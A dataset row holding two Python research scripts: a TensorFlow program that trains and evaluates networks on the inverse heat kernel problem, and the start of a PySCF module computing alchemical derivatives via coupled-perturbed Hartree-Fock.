hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
82fb589d4895880a1af9d3d8d7c3d8fbea1f8c46 | 25,629 | py | Python | heat_kernel_error_vs_time.py | domischi/inv-problem-solver-ml | 9f127544045d735e887c22fdf8d892b4370257b7 | [
"MIT"
] | null | null | null | heat_kernel_error_vs_time.py | domischi/inv-problem-solver-ml | 9f127544045d735e887c22fdf8d892b4370257b7 | [
"MIT"
] | null | null | null | heat_kernel_error_vs_time.py | domischi/inv-problem-solver-ml | 9f127544045d735e887c22fdf8d892b4370257b7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Tensorflow DNNRegressor in Python
# CC-BY-2.0 Paul Balzer
# see: http://www.cbcity.de/deep-learning-tensorflow-dnnregressor-einfach-erklaert
#
# this is next to impossible to set up nicely with argparse, therefore move it at least to the top of the file
#list_of_hl=[
# [16, 16+16, 16+16],
# [16,16,16,16,16],
# [16+16, 16+16, 16],
# [16+16+16,16+16],
# [8,8],
# [256],
# [256,256],
# #[512],
# #[512,512]
# ]
# Import stuff
import argparse
from time import time
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import logging
import sys
import os
from glob import glob
# Output ptions
tf.logging.set_verbosity(tf.logging.WARN)
np.set_printoptions(precision=9)
logging.basicConfig(format='[%(asctime)s] %(message)s', level=logging.INFO)
logging.info('Tensorflow %s' % tf.__version__) # 1.4.1
# Construct parser
parser = argparse.ArgumentParser(description="A python script facilitating the generation as well as the training on the (inverse) heat kernel problem")
parser.add_argument('--root-directory' , type=str , required=True , help ='Where all the data is getting stored')
parser.add_argument('--validation' , action='store_true' , help ='Should the model be validated?')
parser.add_argument('--training' , action='store_true' , help ='Should the model be trained?')
parser.add_argument('--learn-inverse' , action='store_true' , help ='Learn the inverse?')
parser.add_argument('--samples-per-file' , type=int , default=512 , help ='How many samples should be stored in the files')
parser.add_argument('--num-train-files' , type=int , default=256 , help ='How many training files should be generated?')
parser.add_argument('--num-eval-files' , type=int , default=32 , help ='How many evaluation files should be generated?')
parser.add_argument('--max-number-of-gaussians' , type=int , default=3 , help ='Number of Gaussians to be generated')
parser.add_argument('--gaussian-range' , type=float , default=1 , help ='The range for the centers of the gaussians is between +- this value')
parser.add_argument('--sigma-gaussian' , type=float , default=0.02 , help ='The width of the gaussians')
parser.add_argument('--simple-gaussians' , action='store_true' , help ='Only give nice gaussians to learn from, well separated and having not a too narrow width')
parser.add_argument('--sampling-range' , type=float , default=3 , help ='The sampeling range is between +- this value')
parser.add_argument('--num-sampeling-points' , type=int , default=512 , help ='How many sampeling points should be given?')
parser.add_argument('--max-time-to-evolve' , type=float , default=0.01 , help ='What is the maximum time the network should revert?')
parser.add_argument('--min-time-to-evolve' , type=float , default=0.001 , help ='What is the minimum time the network should revert?')
parser.add_argument('--steps-per-epoch' , type=int , default=512 , help ='Steps per epoch')
parser.add_argument('--num-epochs' , type=int , default=200 , help ='Number of epochs')
parser.add_argument('--batch-size' , type=int , default=16384 , help ='Batch size')
parser.add_argument('--dropout' , type=float , default=0. , help ='Dropout (probably always stick to 0)')
parser.add_argument('--dont-delete-detailed-statistics' , action='store_true' , help ='Delete detailed statistics, as they bloat up the directories')
parser.add_argument('--overwrite' , action='store_true' , help ='Overwrite the generated files')
OPTIONS=vars(parser.parse_args())
# Print options
for k in OPTIONS:
logging.info('\tOption {:<30}: {:>10}'.format(k, OPTIONS[k]))
# Set options
TRAINING = OPTIONS ['training']
VALIDATION = OPTIONS ['validation']
LEARN_INVERSE = OPTIONS ['learn_inverse']
DATA_ROOT_PATH = OPTIONS ['root_directory']
NUM_SAMPLES_PER_FILE = OPTIONS ['samples_per_file']
NUM_TRAIN_SAMPLES = OPTIONS ['num_train_files']
NUM_EVAL_SAMPLES = OPTIONS ['num_eval_files']
MAX_NUM_GAUSSIANS = OPTIONS ['max_number_of_gaussians']
GAUSSIAN_MIN = - OPTIONS ['gaussian_range']
GAUSSIAN_MAX = OPTIONS ['gaussian_range']
maxwidth = OPTIONS ['sigma_gaussian']
SAMPELING_MIN = - OPTIONS ['sampling_range']
SAMPELING_MAX = OPTIONS ['sampling_range']
SAMPELING_N = OPTIONS ['num_sampeling_points']
MAX_TIME_TO_EVOLVE = OPTIONS ['max_time_to_evolve']
MIN_TIME_TO_EVOLVE = OPTIONS ['min_time_to_evolve']
STEPS_PER_EPOCH = OPTIONS ['steps_per_epoch']
EPOCHS = OPTIONS ['num_epochs']
BATCH_SIZE = OPTIONS ['batch_size']
dropout = OPTIONS ['dropout']
DELETE_DETAILED_STATISTICS = not OPTIONS ['dont_delete_detailed_statistics']
OVERWRITE = OPTIONS ['overwrite']
SIMPLE_GAUSSIANS = OPTIONS ['simple_gaussians']
# Precompute useful stuff and define the necessary evils
SAMPLING_SPACE=np.linspace(SAMPELING_MIN,SAMPELING_MAX,SAMPELING_N)
FEATURES=['X', 't']
LABEL=['y']
DATA_PREFIX='/data/'
DATA_SUFFIX='.tfrecord'
TRAIN_PREFIX='train'
EVAL_PREFIX='eval'
VALIDATE_PREFIX='validate'
ERROR_VS_TIME_PREFIX='error_vs_time'
def get_XY(SAMPLE_SIZE,LEARN_INVERSE=False):
X=[]
y=[]
t=[]
for i in range(SAMPLE_SIZE):
tmpt,tmpx,tmpy=get_one_XY()
t.append(tmpt)
X.append(tmpx)
y.append(tmpy)
t=np.array(t)
X=np.array(X)
y=np.array(y)
if LEARN_INVERSE:
return t,y,X
return t,X,y
# From https://gist.github.com/swyoon/8185b3dcf08ec728fb22b99016dd533f
def np_to_tfrecords(T, X, Y, file_path_prefix):
# Generate tfrecord writer
result_tf_file = file_path_prefix + DATA_SUFFIX
with tf.python_io.TFRecordWriter(result_tf_file) as writer:
# iterate over each sample,
# and serialize it as ProtoBuf.
for idx in range(X.shape[0]):
t = T[idx]
x = X[idx]
y = Y[idx]
d_feature = {}
d_feature['X'] = tf.train.Feature(float_list=tf.train.FloatList(value=x))
d_feature['y'] = tf.train.Feature(float_list=tf.train.FloatList(value=y))
d_feature['t'] = tf.train.Feature(float_list=tf.train.FloatList(value=[t]))
features = tf.train.Features(feature=d_feature)
example = tf.train.Example(features=features)
serialized = example.SerializeToString()
writer.write(serialized)
def write_tf_records(name, NUM_SAMPLES):
for i in range(NUM_SAMPLES):
t,X,y=get_XY(NUM_SAMPLES_PER_FILE)
#if LEARN_INVERSE:
# y,X=X,y
filename=DATA_ROOT_PATH+DATA_PREFIX+name+str(i)
np_to_tfrecords(t,X,y,filename)
def generate_data(name, NUM_SAMPLES, OVERWRITE=False):
filelist=glob(DATA_ROOT_PATH+DATA_PREFIX+str(name)+'*'+DATA_SUFFIX)
if len(filelist)<NUM_SAMPLES or OVERWRITE:
logging.info('Generate new '+str(name)+' data')
write_tf_records(name,NUM_SAMPLES)
logging.info('Generation of '+name+' data finished')
def dataset_input_fn(filenames,NUM_EPOCHS=1,NUM_BATCHES=32):
dataset = tf.data.TFRecordDataset(filenames)
# Use `tf.parse_single_example()` to extract data from a `tf.Example`
# protocol buffer, and perform any additional per-record preprocessing.
def parser(record):
keys_to_features = {
#'t': tf.FixedLenFeature((), tf.float32, default_value=tf.zeros([], dtype=tf.float32)),
't': tf.FixedLenSequenceFeature((), tf.float32, allow_missing=True ,default_value=tf.zeros([], dtype=tf.float32)),
'X': tf.FixedLenSequenceFeature((), tf.float32, allow_missing=True ,default_value=tf.zeros([], dtype=tf.float32)),
'y': tf.FixedLenSequenceFeature((), tf.float32, allow_missing=True ,default_value=tf.zeros([], dtype=tf.float32)),
}
parsed = tf.parse_single_example(record, keys_to_features)
#t=tf.cast(parsed['t'],tf.float32)
#X=tf.cast(parsed['X'],tf.float32)
#y=tf.cast(parsed['y'],tf.float32)
t=parsed['t']
X=parsed['X']
y=parsed['y']
return {"t": t, "X": X}, y
# Use `Dataset.map()` to build a pair of a feature dictionary and a label
# tensor for each example.
dataset = dataset.map(parser)
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.batch(NUM_BATCHES)
dataset = dataset.repeat(NUM_EPOCHS)
iterator = dataset.make_one_shot_iterator()
# `features` is a dictionary in which each value is a batch of values for
# that feature; `labels` is a batch of labels.
features, labels = iterator.get_next()
return features, labels
def get_input_fn(filenames_start,NUM_EPOCHS=1,NUM_BATCHES=32):
lst=glob(DATA_ROOT_PATH+DATA_PREFIX+filenames_start+'*')
assert(len(lst)>0)
np.random.shuffle(lst)
lst=lst[0:4]
return lambda: dataset_input_fn(lst,NUM_EPOCHS,NUM_BATCHES)
def get_shapes(gt_XY, LEARN_INVERSE=False):
_, tmpx,tmpy=gt_XY(2,LEARN_INVERSE=LEARN_INVERSE)
if len(tmpx.shape)==1: # 1D input data
INPUT_SHAPE=(1,)
elif len(tmpx.shape)==2: # vector input data
INPUT_SHAPE=(tmpx.shape[-1],)
else:
logging.error('Try to input matrix (or higher tensor) data, not yet implemented')
sys.exit()
if len(tmpy.shape)==1: # 1D input data
OUTPUT_SHAPE=1
elif len(tmpy.shape)==2: # vector input data
OUTPUT_SHAPE=tmpy.shape[-1]
else:
logging.error('Try to learn matrix (or higher tensor) data, not yet implemented')
sys.exit()
return INPUT_SHAPE,OUTPUT_SHAPE
def model_name(parm):
s=''
#s+=parm['optimizer']+'_'
s+=parm['activation']+'_K'
#s+=str(parm['conv_also_activate'])+'_'
s+=str( parm['kernel_size'] )+'_t'
hl_list=parm['hidden_units_t']
for hl in hl_list:
s += '{}{}'.format(hl[0][0], hl[1])
s+="_X"
hl_list=parm['hidden_units_X']
for hl in hl_list:
s += '{}{}'.format(hl[0][0], hl[1])
s+="_"
hl_list=parm['hidden_units_combined']
for hl in hl_list:
s += '{}{}'.format(hl[0][0], hl[1])
return s
def read_tffile(PATH):
record_iterator = tf.python_io.tf_record_iterator(path=PATH)
X=[]
Y=[]
T=[]
for string_record in record_iterator:
example = tf.train.Example()
example.ParseFromString(string_record)
X.append(np.array( example.features.feature['X'].float_list.value ))
Y.append(np.array( example.features.feature['y'].float_list.value ))
T.append(np.array( example.features.feature['t'].float_list.value ))
T=np.array(T)
X=np.array(X)
Y=np.array(Y)
return T,X,Y
def one_gaussian(mean, sigma):
return np.exp(-(SAMPLING_SPACE-mean)**2/(2*sigma))/np.sqrt(2*np.pi*sigma)
def one_random_gaussian(a,b):
mean=np.random.rand()*(b-a)+a
sigma=maxwidth*np.random.rand()*(b-a)
return one_gaussian(mean,sigma)
def n_random_gaussians(a,b,n):
y=np.zeros(len(SAMPLING_SPACE))
for i in range(n):
y+=one_random_gaussian(a,b)
return y/n
def n_random_gaussians_simplified(a,b,n):
y=np.zeros(len(SAMPLING_SPACE))
means=None
while True:
means=np.sort( np.random.rand(np.random.randint(n)+1)*(b-a)+a )
if len(means)== 1 or min(abs( means[1:]-means[:-1] ))> (b-a)/(2*len(means)):
break
minwidth=maxwidth/3
sigmas=(maxwidth-minwidth)*np.random.rand(len(means))+minwidth
for m,s in zip(means,sigmas):
y+=one_gaussian(m,s)
return y/n
def n_random_gaussians_simplified(a,b,n):
y=np.zeros(len(SAMPLING_SPACE))
means=None
while True:
means=np.sort( np.random.rand(np.random.randint(n)+1)*(b-a)+a )
if len(means)==1 or min(abs( means[1:]-means[:-1] ))> (b-a)/(2*len(means)):
break
minwidth=maxwidth/3
sigmas=(maxwidth-minwidth)*np.random.rand(len(means))+minwidth
for m,s in zip(means,sigmas):
y+=one_gaussian(m,s)
return y/n
def random_gaussians(a,b):
n=np.random.randint(max_num_gaussians)+1
return n_random_gaussians(a,b,n)
def get_heat_kernel(t):
return np.exp(-SAMPLING_SPACE**2/(4*t))/np.sqrt(4*np.pi*t)
def apply_heat_kernel(input_configuration, t):
return np.convolve(input_configuration,get_heat_kernel(t), 'same')*(SAMPELING_MAX-SAMPELING_MIN)/SAMPELING_N
#return X,y each a numpy array of the right dimension, without further preprocessing (as this is done in get_XY)
def get_one_XY():
TIME_TO_EVOLVE=np.random.rand()*(MAX_TIME_TO_EVOLVE-MIN_TIME_TO_EVOLVE)+MIN_TIME_TO_EVOLVE
if SIMPLE_GAUSSIANS:
X=n_random_gaussians_simplified(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
else:
X=n_random_gaussians(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
y=apply_heat_kernel(X,TIME_TO_EVOLVE)
return TIME_TO_EVOLVE,X,y
os.makedirs(DATA_ROOT_PATH+DATA_PREFIX, exist_ok=True)
#generate_data(TRAIN_PREFIX , NUM_TRAIN_SAMPLES, OVERWRITE=OVERWRITE )
#generate_data(EVAL_PREFIX , NUM_EVAL_SAMPLES , OVERWRITE=OVERWRITE )
#generate_data(VALIDATE_PREFIX , 1 , OVERWRITE=OVERWRITE )
def prod(iterable):
s=1
for i in iterable:
s*=i
return s
def mixed_model(features, labels, mode, params):
"""Create a network for the inverse heat kernel problem
params: dictionary of the relevant values
params['hidden_units']: list of (description_string, num_neurons)
where description_string can be 'dense' or 'conv'
params['activation']: 'relu','leaky_relu', 'elu', 'relu6', 'selu'
params['conv_also_activate']: boolean
params['optimizer']: 'adam', 'adagrad', 'adadelta', 'rmsprop', 'ftrl'
"""
ACTIVATION_FN=None
if 'activation' not in params.keys():
logging.error('Did not supply a activation parameter, aborting...')
sys.exit()
if 'optimizer' not in params.keys():
logging.error('Did not supply an optimizer parameter, aborting...')
sys.exit()
if 'conv_also_activate' not in params.keys():
logging.error('Did not supply a conv_also_activate parameter, aborting...')
sys.exit()
if params['activation']== 'relu':
ACTIVATION_FN=tf.nn.relu
elif params['activation']== 'leaky_relu' :
ACTIVATION_FN=tf.nn.leaky_relu
elif params['activation']== 'elu' :
ACTIVATION_FN=tf.nn.elu
elif params['activation']== 'relu6' :
ACTIVATION_FN=tf.nn.relu6
elif params['activation']== 'selu' :
ACTIVATION_FN=tf.nn.selu
else:
logging.error('Unrecognized activation function {}, aborting'.format(params['activation']))
sys.exit()
X_net=tf.feature_column.input_layer(features, [q for q in params['feature_columns'] if q.key=='X'] )
t_net=tf.feature_column.input_layer(features, [q for q in params['feature_columns'] if q.key=='t'] )
for units in params['hidden_units_t']:
if units[0]=='dense':
t_net = tf.layers.dense(t_net, units=units[1], activation=ACTIVATION_FN)
else:
logging.error('Unrecognized layer type {}, aborting'.format(units[0]))
sys.exit()
for units in params['hidden_units_X']:
if units[0]=='dense':
X_net = tf.layers.dense(X_net, units=units[1], activation=ACTIVATION_FN)
elif units[0]=='conv':
if len(X_net.get_shape().as_list())==2:
X_net=tf.expand_dims(X_net, axis=-1)
if params['conv_also_activate']:
X_net = tf.layers.conv1d(X_net, filters=units[1], kernel_size=params['kernel_size'], activation=ACTIVATION_FN)
else:
X_net = tf.layers.conv1d(X_net, filters=units[1], kernel_size=params['kernel_size'], activation=None)
else:
logging.error('Unrecognized layer type {}, aborting'.format(units[0]))
sys.exit()
X_net=tf.reshape(X_net,[-1,prod(X_net.get_shape().as_list()[1:])])
net= tf.concat([t_net, X_net], -1)
for units in params['hidden_units_combined']:
if units[0]=='dense':
net = tf.layers.dense(net, units=units[1], activation=ACTIVATION_FN)
else:
logging.error('Unrecognized layer type {}, aborting'.format(units[0]))
sys.exit()
net = tf.layers.dense(net, units=SAMPELING_N, activation=None)
# Compute predictions.
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'predictions': net,
}
return tf.estimator.EstimatorSpec(mode, predictions=predictions)
# Compute loss.
loss = tf.losses.mean_squared_error(labels=labels, predictions=net)
if mode == tf.estimator.ModeKeys.EVAL:
return tf.estimator.EstimatorSpec(mode, loss=loss)
# Create training op.
assert mode == tf.estimator.ModeKeys.TRAIN
optimizer=None
if params['optimizer']=='adam':
optimizer = tf.train.AdamOptimizer()
elif params['optimizer']== 'adagrad':
optimizer = tf.train.AdagradOptimizer(learning_rate=0.01)
elif params['optimizer']== 'adadelta':
optimizer = tf.train.AdadeltaOptimizer()
elif params['optimizer']== 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001)
elif params['optimizer']== 'ftrl':
optimizer = tf.train.FtrlOptimizer(0.05)
train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)
INPUT_SHAPE,OUTPUT_SHAPE=get_shapes(get_XY, LEARN_INVERSE=LEARN_INVERSE)
# --------------
feature_columns = [
tf.feature_column.numeric_column('t', shape=(1,)),
tf.feature_column.numeric_column('X', shape=INPUT_SHAPE)
]
activation_list=['leaky_relu','elu']
layer_type_list=['conv','dense']
layer_width_list_t=[2**i for i in range(4,9)]
layer_width_list_X=[16,32]
layer_width_list_combined=[128,256]
def random_choice(iterable):
return iterable[np.random.randint(len(iterable))]
def monte_carlo_the_model():
params={ 'feature_columns': feature_columns }
params['optimizer']='rmsprop'
params['activation']=random_choice(activation_list)
params['conv_also_activate']=True
#params['conv_also_activate']=bool(np.random.randint(2))
params['hidden_units_t']=[]
params['hidden_units_X']=[]
params['hidden_units_combined']=[]
params['kernel_size']=np.random.randint(5)+1
for i in range( np.random.randint(2) +1):
tmp=['dense', random_choice(layer_width_list_t)]
params['hidden_units_t'].append(tmp)
for i in range( np.random.randint(2) ):
tmp=['conv', random_choice(layer_width_list_X)]
params['hidden_units_X'].append(tmp)
for i in range( 1 ):
tmp=['dense', random_choice(layer_width_list_combined)]
params['hidden_units_combined'].append(tmp)
return params
def get_one_X():
if SIMPLE_GAUSSIANS:
X=n_random_gaussians_simplified(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
else:
X=n_random_gaussians(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
return X
def get_one_XY_fixed_t(TIME_TO_EVOLVE):
if SIMPLE_GAUSSIANS:
X=n_random_gaussians_simplified(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
else:
X=n_random_gaussians(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
y=apply_heat_kernel(X,TIME_TO_EVOLVE)
return TIME_TO_EVOLVE,X,y
def get_XY_fixed_t(NUM_SAMPLES_PER_FILE, fixed_t=None):
if fixed_t==None:
return get_XY(NUM_SAMPLES_PER_FILE)
else:
X=[]
y=[]
t=[]
for i in range(NUM_SAMPLES_PER_FILE):
tmpx=get_one_X()
for T in np.linspace(MIN_TIME_TO_EVOLVE, MAX_TIME_TO_EVOLVE, fixed_t):
tmpy=apply_heat_kernel(tmpx,T)
t.append(T)
X.append(tmpx)
y.append(tmpy)
t=np.array(t)
X=np.array(X)
y=np.array(y)
if LEARN_INVERSE:
return t,y,X
return t,X,y
def generate_error_data(name, NUM_SAMPLES, NUM_TIMES, OVERWRITE=False):
filelist=glob(DATA_ROOT_PATH+DATA_PREFIX+str(name)+'*'+DATA_SUFFIX)
if len(filelist)<NUM_SAMPLES or OVERWRITE:
logging.info('Generate new '+str(name)+' data')
t,X,y=get_XY_fixed_t(NUM_SAMPLES, NUM_TIMES)
if LEARN_INVERSE:
y,X=X,y
filename=DATA_ROOT_PATH+DATA_PREFIX+name+str(0)
np_to_tfrecords(t,X,y,filename)
logging.info('Generation of '+name+' data finished')
already_done=[]
counter=0
PLOT_ALL=False
NUM_TIMES=20
NUM_SAMPLES_FOR_ERR_VS_TIME=128
generate_error_data(ERROR_VS_TIME_PREFIX,NUM_SAMPLES_FOR_ERR_VS_TIME,NUM_TIMES,OVERWRITE=True)
while True:
parm=monte_carlo_the_model()
MODEL_PATH=DATA_ROOT_PATH+'/models/'
MODEL_PATH += model_name(parm)
if not os.path.exists(MODEL_PATH):
continue
logging.info('Loading %s' % MODEL_PATH)
if MODEL_PATH in already_done:
counter+=1
if counter == 20:
print('Did not find no new models, aborting...')
break
continue
counter=0
already_done.append(MODEL_PATH)
# Validation and Test Configuration
test_config = tf.estimator.RunConfig(save_checkpoints_steps=None,
save_checkpoints_secs=600,
keep_checkpoint_max=1,
model_dir=MODEL_PATH)
# Building the Network
regressor = tf.estimator.Estimator(
model_fn=mixed_model,
config=test_config,
params=parm
)
plt.ioff()
logging.info('Only do the validation')
VALIDATION_PATH=DATA_ROOT_PATH+'/validation/'+model_name(parm)+'/'
#T,X,Y=read_tffile(glob( DATA_ROOT_PATH+'/data/'+ERROR_VS_TIME_PREFIX+'*' )[0])
T,Y,X=read_tffile(glob( DATA_ROOT_PATH+'/data/'+ERROR_VS_TIME_PREFIX+'*' )[0])
y_dnn=regressor.predict(input_fn=lambda :{'X': tf.convert_to_tensor(X, name='X'), 't': tf.convert_to_tensor(T, name = 't')})
logging.info('\tStart validation for '+model_name(parm))
L2_t0=dict()
L2_t1=dict()
for i,y in enumerate(y_dnn):
if i >= len(X) or i >=NUM_TIMES*NUM_SAMPLES_FOR_ERR_VS_TIME:
break
if LEARN_INVERSE:
y_pred_for_plot=np.array(y['predictions'])
tim = T[i][0]
if PLOT_ALL:
fig, (ax1,ax2,ax3)=plt.subplots(3,1,figsize=(10,6), sharex=True)
plt.sca(ax1)
plt.title('t={:5f}'.format(float(0)))
plt.plot(SAMPLING_SPACE , Y[i] , label='Real')
plt.plot(SAMPLING_SPACE , y_pred_for_plot , label='Network')
plt.ylabel('Heat profile')
plt.legend(loc='best')
plt.sca(ax2)
plt.title('t={:5f}'.format(float(tim )))
plt.plot(SAMPLING_SPACE , X[i] , label='Real' )
plt.plot(SAMPLING_SPACE , apply_heat_kernel( y_pred_for_plot, tim ) , label='Network')
plt.ylabel('Heat profile')
plt.legend(loc='best')
plt.sca(ax3)
plt.plot(SAMPLING_SPACE , y_pred_for_plot-Y[i] , label=r'$\Delta(t=0)$')
plt.plot(SAMPLING_SPACE , apply_heat_kernel( y_pred_for_plot, tim )-X[i] , label=r'$\Delta(t=$'+str(tim)+'$)$')
plt.ylabel('Difference')
plt.legend(loc='best')
plt.show(block=True)
os.makedirs(VALIDATION_PATH, exist_ok=True)
if LEARN_INVERSE:
assert(max(X[i])<max(Y[i]))
e_t0=np.linalg.norm(y_pred_for_plot-Y[i]) /len(Y[i])
e_t1=np.linalg.norm(apply_heat_kernel( y_pred_for_plot, tim )-X[i])/len(X[i])
#e_t1=np.linalg.norm(y_pred_for_plot-Y[i]) /len(Y[i])
#e_t0=np.linalg.norm(apply_heat_kernel( y_pred_for_plot, tim )-X[i])/len(X[i])
if tim in L2_t0.keys():
L2_t0[tim].append(e_t0)
L2_t1[tim].append(e_t1)
else:
L2_t0[tim]=[e_t0]
L2_t1[tim]=[e_t1]
else:
assert(False)
del y_dnn
Ts=np.array(sorted( L2_t0.keys() ))
print('debug', len(L2_t1[Ts[0]]))
L2_t0_mean=[np.mean(L2_t0[t]) for t in Ts]
L2_t0_err =[np.std(L2_t0[t]) for t in Ts]
L2_t1_mean=[np.mean(L2_t1[t]) for t in Ts]
L2_t1_err =[np.std(L2_t1[t]) for t in Ts]
eps=4e-5
plt.errorbar(Ts+eps, L2_t0_mean, yerr=L2_t0_mean, label='Reconstruced')
plt.errorbar(Ts-eps, L2_t1_mean, yerr=L2_t1_mean, label='Forwarded')
plt.legend(loc='best')
logging.info('\tEnded validation for '+model_name(parm))
plt.show(block=True)
sys.exit()
| 43.660988 | 191 | 0.63077 |
7993f39f4f9f6cd0e9a356658216426c84ed0e0b | 4,867 | py | Python | Alchemical_CPHF_perturbator/alch_deriv.py | giorgiodomen/Supplementary_code_for_Quantum_Alchemy | 2db1c1386f1a408cae05b7cbe21e2dab5159c181 | [
"MIT"
] | 1 | 2020-07-27T07:06:22.000Z | 2020-07-27T07:06:22.000Z | Alchemical_CPHF_perturbator/alch_deriv.py | giorgiodomen/Supplementary_code_for_Quantum_Alchemy | 2db1c1386f1a408cae05b7cbe21e2dab5159c181 | [
"MIT"
] | null | null | null | Alchemical_CPHF_perturbator/alch_deriv.py | giorgiodomen/Supplementary_code_for_Quantum_Alchemy | 2db1c1386f1a408cae05b7cbe21e2dab5159c181 | [
"MIT"
] | null | null | null | import pyscf.qmmm
from pyscf import gto, scf
import numpy as np
import pyscf.qmmm
from pyscf import gto, scf
import numpy as np
from pyscf import lib
from functools import reduce
from pyscf.scf import cphf
from pyscf import lib
from pyscf.prop.nmr import rhf as rhf_nmr
from AP_utils import alias_param,parse_charge,DeltaV
def alchemy_cphf_deriv(mf,int_r, with_cphf=True):
polobj=mf.Polarizability()
mol = mf.mol
mo_energy = mf.mo_energy
mo_coeff = mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
orbv = mo_coeff[:,~occidx]
charges = mol.atom_charges()
coords = mol.atom_coords()
charge_center = np.einsum('i,ix->x', charges, coords) / charges.sum()
h1 = lib.einsum('pq,pi,qj->ij', int_r, mo_coeff.conj(), orbo) #going to molecular orbitals
h1=h1.reshape((1,h1.shape[0],h1.shape[1]))
s1 = np.zeros_like(h1)
vind = polobj.gen_vind(mf, mo_coeff, mo_occ)
if with_cphf:
mo1,e1 = cphf.solve(vind, mo_energy, mo_occ, h1, s1, polobj.max_cycle_cphf, polobj.conv_tol)
else:
mo1 = rhf_nmr._solve_mo1_uncoupled(mo_energy, mo_occ, h1, s1)[0]
return mo1[0],e1[0]
def first_deriv_nuc_nuc(mol,dL):
"""dL=[[i1,i2,i3],[c1,c2,c3]]"""
dnn=0
for j in range(len(dL[0])):
r2 = mol.atom_coord(dL[0][j])
for i in range(mol.natm):
if i != dL[0][j]:
q1 = mol.atom_charge(i)
r1 = mol.atom_coord(i)
r = np.linalg.norm(r1-r2)
dnn += (q1 * dL[1][j])/ r
return dnn
def second_deriv_nuc_nuc(mol,dL):
"""dL=[[i1,i2,i3],[c1,c2,c3]]"""
dnn=0
for j in range(len(dL[0])):
r2 = mol.atom_coord(dL[0][j])
for i in range(len(dL[0])):
if dL[0][i] > dL[0][j]:
r1 = mol.atom_coord(dL[0][i])
r = np.linalg.norm(r1-r2)
dnn += (dL[1][i] * dL[1][j])/ r
return 2*dnn
def first_deriv_elec(mf,int_r):
P=mf.make_rdm1()
return np.einsum('ij,ji',P,int_r)
def second_deriv_elec(mf,int_r,mo1):
orbo = mf.mo_coeff[:, :mo1.shape[1]]
h1 = lib.einsum('pq,pi,qj->ij', int_r, mf.mo_coeff.conj(), orbo)
e2 = np.einsum('pi,pi', h1, mo1)
e2 *= 4
return e2
def third_deriv_elec(mf,int_r,mo1,e1): #only for one site (d^3 E /dZ^3)
mo_coeff = mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
mo1 = lib.einsum('qi,pq->pi', mo1, mo_coeff)
dm1 = lib.einsum('pi,qi->pq', mo1, orbo) * 2
dm1 = dm1 + dm1.transpose(1,0)
vresp = mf.gen_response(hermi=1) # (J-K/2)(dm)
h1ao = int_r + vresp(dm1)#Fock matrix
e3 = lib.einsum('pq,pi,qi', h1ao, mo1, mo1) * 2 # *2 for double occupancy
e3 -= lib.einsum('pq,pi,qj,ij', mf.get_ovlp(), mo1, mo1, e1) * 2
e3 *=6
return e3
def alch_deriv(mf,dL=[]):
""" alch_deriv(mf,dL=[]) returns U,dP for a dl=.001 times the charges
dL can be the whole list of nuclear charges placed on atom, with length equals to mol.natm (eg.[0,1,0,0,-1,...,0])
or alternatively a list with two sublist of equal length in the form [[atm_idxs],[atm_charges]]
"""
mol=mf.mol
dL=parse_charge(dL)
int_r=DeltaV(mol,dL)
mo1,e1=alchemy_cphf_deriv(mf,int_r)
der1=first_deriv_elec(mf,int_r)+first_deriv_nuc_nuc(mol,dL)
der2=second_deriv_elec(mf,int_r,mo1)+second_deriv_nuc_nuc(mol,dL)
der3=third_deriv_elec(mf,int_r,mo1,e1)
return (der1,der2,der3)
def make_dP(mf,mo1):
mol=mf.mol
nao=mol.nao
nocc=mf.mol.nelec[0]
C=mf.mo_coeff
dP=np.zeros_like(C)
dP[:,:]=2*np.einsum('ij,jk,lk->il',C,mo1,C[:,:nocc])
return dP+dP.T
def make_U(mo1):
U=np.zeros((mo1.shape[0],mo1.shape[0]))
U[:,:mo1.shape[1]]=mo1
U=U-U.T
return U
def alch_hessian(mf,int_r,mo1):
mo_coeff=mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
h1 = lib.einsum('xpq,pi,qj->xij', int_r, mo_coeff.conj(), orbo)
